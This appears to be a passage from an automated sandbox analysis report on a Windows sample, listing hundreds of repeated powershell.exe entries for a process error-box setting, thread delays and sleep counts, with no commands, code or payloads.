          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4304Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3649Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4581Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1264Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6995Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2578Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6467
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3213
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6816
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2699
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7454
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2233
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6748
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2987
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6273
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3414
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep count: 4304 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 3649 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 4581 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep count: 1264 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\timeout.exe TID: 7988Thread sleep count: 65 > 30Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 1136Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8216Thread sleep count: 6995 > 30Jump to behavior
